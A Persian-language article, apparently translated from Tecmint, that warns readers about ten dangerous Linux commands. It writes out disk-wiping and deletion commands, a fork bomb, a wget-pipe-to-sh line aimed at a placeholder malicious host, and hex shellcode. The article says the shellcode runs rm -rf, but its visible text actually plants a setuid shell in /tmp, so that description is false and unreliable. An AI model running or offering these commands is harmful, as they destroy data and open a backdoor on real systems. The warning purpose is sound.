10 دستور خطرناکی نباید در لینوکس اجرا کنید
خط فرمان لینوکس مسیار کاربردی، مفید و جالب است، اما گاهی اوقات ممکن است خیلی خطرناک باشد، مخصوصا وقتی از کاری که می خواهید انجام دهید و یا دستوری که می خواهید وارد کنید مطمئن نیستید. این مقاله قصد ندارد شما را از خط فرمان لینوکس خشمگین کند. ما فقط می خواهیم شما را از بعضی از دستورات آگاه کنیم که قبل از اینکه آنها را اجرا کنید باید چندین بار آنها را یررسی کنید.
1. دستور rm -rf
دستور rm -rf یکی از سریع ترین راه ها برای پاک کردن پوشه و محتویات آن است. اما یک بی احتیاتی کوچک ممکن است به یک آسیب غیر قابل برگشت منجر شود.
از این رو هنگام اجرای دستور rm -rf مراقب باشید. برای غلبه بر حذف تصادفی از فایل با دستور ‘rm’، یک نام مستعار از دستور rm را به عنوان ‘rm -i’ در فایل ‘.bashrc’ ایجاد کنید که از شما یک تایید قبل از حذف هر چیزی می خواهد.
2. دستور :(){:|:&};:
دستور زیر در واقع یک بمب افشان است. این کار با تعریف یک تابع به نام ‘:’ انجام می شود، که خود را دوبار، یک بار در پیش زمینه و یک بار در پس زمینه تماس می دهد. آن را تا زمانی که سیستم خاموش می شود، دوباره اجرا می کند.
1 |
:(){:|:&};: |
3. دستور > /dev/sda
دستور بالا خروجی فرمان را در بلوک /dev/sda می نویسد. دستور بالا داده های خام را می نویسد و تمام فایل ها در بلوک با داده های خام جایگزین می شوند و در نتیجه کل داده ها در بلوک را از دست می دهند.
4. mv به مسیر /dev/null
دستور بالا پوشه را به /dev/null منتقل می کند. در لینوکس /dev/null یا null یک فایل ویژه ای است که تمام داده های نوشته شده روی آن را حذف می کند و گزارش می دهد که عملیات نوشتن موفقیت آمیز است.
1 |
# mv /home/user/* /dev/null |
5. wget http://malicious_source -O- | sh
دستور بالا یک اسکریپت را از یک منبع مخرب دانلود می کند و سپس آن را اجرا می کند. دستور Wget اسکریپت را دانلود می کند و SH اسکریپت دانلود شده را اجرا می کند.
نکته: شما معمولا از منابع بسیار زیادی برای دانلود بسته ها و اسکریپت ها استفاده می کنید. فقط از اسکریپت ها و برنامه های کاربردی استفاده کنید که از یک منبع قابل اعتماد دانلود شده است.
6. mkfs.ext3 /dev/sda
فرمان فوق دیسک ‘sda’ را فرمت می کند و مطمئنا می دانید که پس از اجرای فرمان فوق، بلوک (Hard Disk Drive) کاملا پاک خواهد شد، بدون هیچ گونه اطلاعات، سیستم شما را به حالت غیرقابل برگشت تبدیل می کند.
7. > file
دستور بالا برای محو کردن محتویات فایل استفاده می شود. اگر دستور بالا به اشتباه یا مانند “> xt.conf” اجرا شود، فایل پیکربندی یا هر سیستم یا فایل پیکربندی دیگر را ازبین می برد.
8. ^foo^bar
این فرمان برای ویرایش فرمان اجرا شده قبلی بدون نیاز به تایپ مجدد تمام فرمان استفاده می شود. اما اگر واقعا خطر تغییر کامل دستور را با استفاده از فرمان ^foo^bar در معرض خطر قرار ندهید، ممکن است واقعا مشکل باشد.
9. dd if=/dev/random of=/dev/sda
دستور بالا، sda بلوک را پاک می کند و داده های ناخواسته تصادفی را به بلوک ارسال می کند. البته! سیستم شما در مرحله ناسازگار و غیرقابل برگشت باقی خواهد ماند.
10. دستورات پنهان
دستور زیر چیزی جز اولین فرمان بالا نیست (rm -rf). در اینجا کد ها در hex پنهان می شوند تا کاربران را فریب دهد. اجرای کد زیر در ترمینال شما، پارتیشن ریشه شما را پاک می کند.
این دستور در اینجا نشان می دهد که تهدید ممکن است پنهان و گاهی اوقات قابل تشخیص نیست. شما باید از آنچه که انجام می دهید آگاه باشید و نتیجه آن چیست. کد را از منبع ناشناخته کامپایل نکنید.
1 2 3 4 5 6 7 8 9 10 11 |
char esp[] __attribute__ ((section(“.text”))) /* e.s.p release */ = “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″ “\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″ “\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″ “\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″ “\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″ “\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″ “\x6e\x2f\x73\x68\x00\x2d\x63\x00″ “cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;”; |
توجه: هر یک از دستورات فوق را در ترمینال یا پوسته لینوکس یا رایانه دوست یا مدرسه خود اجرا نکنید. اگر می خواهید آنها را آزمایش کنید، آنها را در ماشین مجازی اجرا کنید. هر گونه تداخل یا از دست دادن اطلاعات، به دلیل اجرای فرمان های فوق، سیستم شما را از بین می برد که برای آن نه نویسنده مقاله و نه Tecmint مسئول نیست.